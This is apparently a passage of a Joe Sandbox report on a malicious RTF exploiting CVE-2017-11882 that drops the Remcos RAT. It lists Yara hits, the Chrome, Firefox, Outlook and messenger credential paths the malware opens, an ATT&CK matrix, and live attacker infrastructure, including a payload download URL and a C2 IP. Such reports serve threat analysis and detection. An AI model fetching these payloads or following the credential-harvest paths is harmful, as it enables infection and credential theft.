Code function: 5_2_00CF4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00CF4AFE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.394502954.0000000000794000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\SysWOW64\svchost.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

7_2_0040BA4D

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\SysWOW64\svchost.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		7_2_0040BB6B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: \key3.db		7_2_0040BB6B

Searches for Windows Mail specific files

Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3704, type: MEMORYSTR

Source: name.exe	Binary or memory string: WIN_81
Source: name.exe	Binary or memory string: WIN_XP
Source: name.exe	Binary or memory string: WIN_XPe
Source: name.exe	Binary or memory string: WIN_VISTA
Source: name.exe	Binary or memory string: WIN_7
Source: name.exe	Binary or memory string: WIN_8
Source: taskhostw[1].exe.2.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\svchost.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-FI789R			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-FI789R			Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.394502954.0000000000794000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR

Source: C:\Windows\SysWOW64\svchost.exe

Code function: cmd.exe

7_2_0040569A

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D66399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	5_2_00D66399
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D6685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	5_2_00D6685D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01406399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	6_2_01406399
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0140685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	6_2_0140685D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	211 Scripting	2 Valid Accounts	2 Native API	211 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	33 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	33 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	1 Bypass User Account Control	2 Obfuscated Files or Information	1 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	2 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Windows Service	2 Valid Accounts	1 DLL Side-Loading	3 Credentials In Files	4 File and Directory Discovery	Distributed Component Object Model	121 Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Bypass User Account Control	LSA Secrets	138 System Information Discovery	SSH	3 Clipboard Data	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Windows Service	1 Masquerading	Cached Domain Credentials	23 Security Software Discovery	VNC	GUI Input Capture	122 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	422 Process Injection	2 Valid Accounts	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	2 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	422 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
WC5Gv13cOQ.rtf	53%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882
WC5Gv13cOQ.rtf	51%	Virustotal		Browse
WC5Gv13cOQ.rtf	100%	Avira	HEUR/Rtf.Malformed

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\directory\name.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\taskhostw.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe	55%	ReversingLabs	Win32.Trojan.Shadow
C:\Users\user\AppData\Local\directory\name.exe	55%	ReversingLabs	Win32.Trojan.Shadow
C:\Users\user\AppData\Roaming\taskhostw.exe	55%	ReversingLabs	Win32.Trojan.Shadow

Source	Detection	Scanner	Label
http://www.imvu.comr	0%	URL Reputation	safe
https://support.google.com	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
http://www.imvu.com	0%	URL Reputation	safe
http://geoplugin.net/json.gp	0%	URL Reputation	safe
http://www.ebuddy.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
geoplugin.net	178.237.33.50	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://104.168.7.25/350/taskhostw.exe	true		unknown
http://geoplugin.net/json.gp	true	URL Reputation: safe	unknown
107.173.4.16	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://b.scorecardresearch.com/beacon.js	bhv41C2.tmp.9.dr	false		unknown
http://acdn.adnxs.com/ast/ast.js	bhv41C2.tmp.9.dr	false		unknown
http://www.imvu.comr	svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_	bhv41C2.tmp.9.dr	false		unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1	bhv41C2.tmp.9.dr	false		unknown
https://support.google.com	svchost.exe, 00000009.00000003.378925732.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	svchost.exe, 00000009.00000003.378615082.000000000055E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.378336517.0000000000560000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.379157015.00000000025A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.378511247.00000000026AD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png	bhv41C2.tmp.9.dr	false		unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9	bhv41C2.tmp.9.dr	false		unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html	bhv41C2.tmp.9.dr	false		unknown
http://www.nirsoft.net	svchost.exe, 00000009.00000002.378984808.0000000000124000.00000004.00000010.00020000.00000000.sdmp	false		unknown
https://deff.nelreports.net/api/report?cat=msn	bhv41C2.tmp.9.dr	false	URL Reputation: safe	unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js	bhv41C2.tmp.9.dr	false		unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		unknown
http://cache.btrll.com/default/Pix-1x1.gif	bhv41C2.tmp.9.dr	false		unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683	bhv41C2.tmp.9.dr	false		unknown
https://www.google.com	svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		unknown
http://104.168.7.25/350/taskhostw.exej	EQNEDT32.EXE, 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://geoplugin.net/json.gp/C	name.exe, 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://o.aolcdn.com/ads/adswrappermsni.js	bhv41C2.tmp.9.dr	false		unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js	bhv41C2.tmp.9.dr	false		unknown
http://www.msn.com/?ocid=iehp	bhv41C2.tmp.9.dr	false		unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033	bhv41C2.tmp.9.dr	false		unknown
http://104.168.7.25/350/taskhostw.exennC:	EQNEDT32.EXE, 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://static.chartbeat.com/js/chartbeat.js	bhv41C2.tmp.9.dr	false		unknown
http://www.msn.com/de-de/?ocid=iehp	bhv41C2.tmp.9.dr	false		unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%	bhv41C2.tmp.9.dr	false		unknown
http://www.nirsoft.net/	svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		unknown
http://104.168.7.25/350/taskhostw.exe&c	EQNEDT32.EXE, 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3	bhv41C2.tmp.9.dr	false		unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683	bhv41C2.tmp.9.dr	false		unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(	bhv41C2.tmp.9.dr	false		unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9	bhv41C2.tmp.9.dr	false		unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh	bhv41C2.tmp.9.dr	false		unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js	bhv41C2.tmp.9.dr	false		unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey	bhv41C2.tmp.9.dr	false		unknown
https://contextual.media.net/8/nrrV73987.js	bhv41C2.tmp.9.dr	false		unknown
http://www.imvu.com	svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contextual.media.net/	bhv41C2.tmp.9.dr	false		unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js	bhv41C2.tmp.9.dr	false		unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2	bhv41C2.tmp.9.dr	false		unknown
http://www.msn.com/	bhv41C2.tmp.9.dr	false		unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	bhv41C2.tmp.9.dr	false		unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549	bhv41C2.tmp.9.dr	false		unknown
http://www.imvu.com/Y	svchost.exe, 0000000B.00000002.371347522.000000000019C000.00000004.00000010.00020000.00000000.sdmp	false		unknown
http://cdn.at.atwola.com/_media/uac/msn.html	bhv41C2.tmp.9.dr	false		unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset	bhv41C2.tmp.9.dr	false		unknown
https://policies.yahoo.com/w3c/p3p.xml	bhv41C2.tmp.9.dr	false		unknown
http://www.msn.com/advertisement.ad.js	bhv41C2.tmp.9.dr	false		unknown
http://www.ebuddy.com	svchost.exe, 00000007.00000002.854855395.00000000003C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.371477702.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.168.7.25	unknown	United States	36352	AS-COLOCROSSINGUS	true
107.173.4.16	unknown	United States	36352	AS-COLOCROSSINGUS	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532435
Start date and time:	2024-10-13 07:28:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	WC5Gv13cOQ.rtf renamed because original name is a hash value
Original Sample Name:	904af9fb7e5bee74577f430af1080585.rtf
Detection:	MAL
Classification:	mal100.rans.phis.troj.spyw.expl.evad.winRTF@20/22@1/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 66 Number of non-executed functions: 229
Cookbook Comments:	Found application associated with file extension: .rtf Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Active ActiveX Object Scroll down Close Viewer Override analysis time to 71340.9801220196 for current running targets taking high CPU consumption Override analysis time to 142681.960244039 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

